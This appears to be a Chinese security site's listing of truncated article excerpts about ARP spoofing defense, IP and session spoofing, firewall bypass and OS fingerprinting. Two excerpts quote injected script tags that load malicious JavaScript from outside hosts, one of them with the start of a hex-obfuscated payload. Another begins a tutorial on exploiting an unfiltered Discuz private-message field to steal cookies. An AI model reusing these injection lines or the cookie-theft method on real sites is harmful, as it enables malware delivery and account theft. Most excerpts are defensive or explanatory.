服务器的ARP欺骗攻击的防范         这些天我的服务器几乎天天都被人ARP欺骗攻击，网页被挂木马，实在烦死了，深圳的龙岗电信机房实在是够恶心的，不得已，我只好寻找一些防范ARP攻击的方法，目前发现可以使用静态地址法和使用专用软件的方法来防范ARP欺骗攻击。　　静态地址法指的是，在本地服务器上，将路由器的MAC地址设置为静态的方式来阻止别人对我的ARP攻击，如果你也越到了类似的ARP欺骗攻击，也可以参考这个方法进行设置。　　首先，找到路由器真实的MAC地址，在没有被攻击的条件下，输入命令arp&nb...

   大家都知道，通过PING和TRACERT程序能判断目标主机类型。ping最主要的用处是检测目标主机是否连通。TRACERT利用ICMP数据包和数据包头部中和IP数据包中TTL的值，防止数据包不断在IP互联层上永远不终止地循环      许多入侵者首先会PING一下你的机子，如见到TTL值为128就可以认为你的系统为WINDOWNT/2000，如果TTL值是32则认为目标主机操作系统是WINDOWS95/98，如果TTL值是255/64就认为是UNIX/LIUX操作系统。既然入侵者那么相信TTL值所反...

什么是ARP？如何防范ARP欺骗技术? 　　什么是ARP？如何防范ARP欺骗技术?　　　首先说一下什么是ARP。如果你在UNIX Shell下输入 arp -a (9x下也是），你的输出看起来应该是这样的：　　Interface: xxx.xxx.xxx.xxx　　Internet Address Physical Address Type xxx.xxx.xxx.xxx 00-00-93-64-48-d2 dynamic 　　xxx.xxx.xxx.xx...

该病毒发作时症状表现为： 1）计算机网络连接正常，但无法上网或者时通时断，经常掉线；2）用户私密信息（如QQ、网游等帐号）被窃取；3）局域网内出现网络拥塞，甚至造成一些网络设备当机；基本概念： 为了能够说明问题，有必要先来介绍一些基本概念，知者略过。首先来说IP地址，大家应该都很熟悉了，我们知道，IP地址是一段32位（二进制）的无符号整数，例如：192.168.110.1，其最基本的作用就是在（IP）网络中唯一标识一台特定的主机。在Internet上，我们正是凭借IP地址来定位其他主机或者设备并进行相互通讯的。需要注意的是，IP协议位于OSI参考模型的第三层，即网络层，我们...

公司局域网访问所有页面都加上了<script src=http://16a.us/2.js></script>代码，这次是客户端打开的所有网页，故可排除是服务器环境遭遇arp欺骗，综合网上各方意见，得出结论：本地网关或dns被劫持，修复本地连接后故障消除。根本解决方法，绑定网关mac地址，方法为：命令行输入arp -s 网关IP 网关MAC关于网关MAC，可使用arp命令查询。如果是dns被劫持，则更改dns服务器。关于js加密解密的两篇文章，想研究上面病毒脚本的朋友可能用得着http://bbs.blueidea.com/vie...

昨天晚上发现访问我的网站的时候网页代码html的前面多了一串js代码。刚开始以为网站被黑了，赶紧到服务器上查看所有文件是否带有这串js代码，搜索结果没有，而且服务器也没发现被入侵的痕迹。<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>于是只能从这段代码入手，我下载这个js开发发现是下面一段代码：[code]window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x44\x49\x5...

最近我的网站突然出现访问的迟钝，并且打开之后杀毒软件立即提示含有木马病毒。我就很纳闷，运行了4年的网站一直都好好的最近怎么出现病毒提示呢。职业习惯原因打开了网站的源代码查看，原来在网页源代码的头部被加入了<iframe>嵌套框架网页，该网页执行木马程序……按照常理我心中一寒：估计是服务器被人攻陷了，所有文件代码被加了此行代码，于是FTP上去，下载文件下来查看却没有该代码。于是询问服务器管理员含笑，他一听就说：“是中ARP欺骗的病毒攻击了”。那么什么是“ARP欺骗”呢？首先，ARP的意思是AddressResolutionProtocol（地址解析协议），它是一个位于TCP/IP协议...

这次我拿Discuz示范给大家看,首先我们都知道,Discuz在pm.php的程式中,并没有对   会员名字做过滤,导致我们可以写入一些script.   聪明的同学们,想到了吗?我们正可以利用这个漏洞写一段获取cookies的script.   这是要像看到颜色 就会反应的!(取自 数学补习班= =")   所以我们先从本端 获取自己cookies看看...   例句:  &...

第一部分  　　 1.什么是IP spoof?  　　 IP spoof即IP 电子欺骗，我们可以说是一台主机设备冒充另外一台主机的IP地址，与其它设备通信，从而达到某种目的技术。  　　 2.IP spoof可以实现吗?  　　 可以实现，早在1985年，贝尔实验室的一名工程师Robbert Morris在他的一篇文章A weakness in the 4.2bsd &nbs...

不知不觉“LM团伙”看黑防已有两个春秋了，期期不落。潜心修炼了这么久，也能开始耍上一两招了。看了黑防第二期的《DreamWeaver引发网络危机》一文，“LM团伙”内心有说不出的激动，心想网上有40%的网页都有这样的漏洞，那岂不是又能收获N多肉鸡了。可是仔细研究发现，这个文章的方法存在一些问题，并不像想象中的那样容易发挥。下面就与大家一起讨论一下Session。 既然是谈Session欺骗，那么就先来看一下Session到底是什么，它是怎么工作的。在ASP中，服务器能通过Session对象区分不同的浏览器，因为Session对象是用来记录浏览器端的变量，存储一些如用户名等比较敏感或有...

　　一般的访问控制主要在防火墙中进行设置，制定一些安全策略：如内部局域网的资源不允许外部网上的用户使用；不设防区(又称非军事区)可以为内部或外部局域网，其中的资源允许外部网的用户有限度地使用；可以使外部用户访问非军事区（DMZ区）的WEB服务器等等。　　深入分析研究防火墙技术，利用防火墙配置和实现的漏洞，可以对它实施攻击。通常情况下，有效的攻击都是从相关的子网进行的，因为这些网址得到了防火墙的信赖，虽说成功与否尚取决于机遇等其他因素，但对攻击者而言很值得一试。　　突破防火墙系统最常用的方法是IP地址欺骗，它同时也是其他一系列攻击方法的基础。之所以使用这个方法，是因为IP自身的缺点。IP协议依据...